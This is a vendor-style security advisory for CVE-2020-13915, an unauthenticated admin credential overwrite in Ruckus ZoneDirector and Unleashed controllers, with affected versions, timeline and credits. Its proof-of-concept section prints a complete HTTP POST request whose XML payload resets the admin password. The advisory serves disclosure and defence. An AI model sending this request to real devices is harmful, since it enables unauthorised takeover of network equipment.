Unauthenticated admin credentials overwrite

Aleph Research Advisory

Identifier

CVE-2020-13915

Severity

Critical

Product

ZoneDirector
Unleashed

Vulnerable Version

ZoneDirector: 9.9 and before
ZoneDirector: 9.10.x
ZoneDirector: 9.12.x
ZoneDirector: 9.13.x
ZoneDirector: 10.0.x
ZoneDirector: 10.1.x
ZoneDirector: 10.2.x
ZoneDirector: 10.3.x
Unleashed: 200.6 and before
Unleashed: 200.7

Technical Details

Insecure permissions in emfd/libemf in Ruckus Wireless Unleashed through 200.7.10.102.92 allow a remote attacker to overwrite admin credentials via an unauthenticated crafted HTTP request.

Information about the exploitation of this vulnerability can alos be found in our DEFCON 28 talk.

Proof Of Concept

POST /admin/_wla_conf.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 248
Connection: close

<ajax-request action='setconf' updater='acl-list.1579433244273.4243' comp='/system'>
	<admin username="admin" x-password="NewPass!" auth-token="" reset=true IS_PARTIAL="" auth-by="local" authsvr-id='0' fallback-local="true" />
</ajax-request>

Timeline

05-Aug-20
: Public disclosure.
15-Jun-20
: Patch available.
07-Jun-20
: CVE-2020-13915 assigned.
05-Feb-20
: Reported (Ruckus Product Security Team).

Posts

Don't Ruck Us Again - The Exploit Returns
By Gal Zror,
14-Oct 2020

Credit

Gal Zror (@waveburst) of Aleph Research, HCL Technologies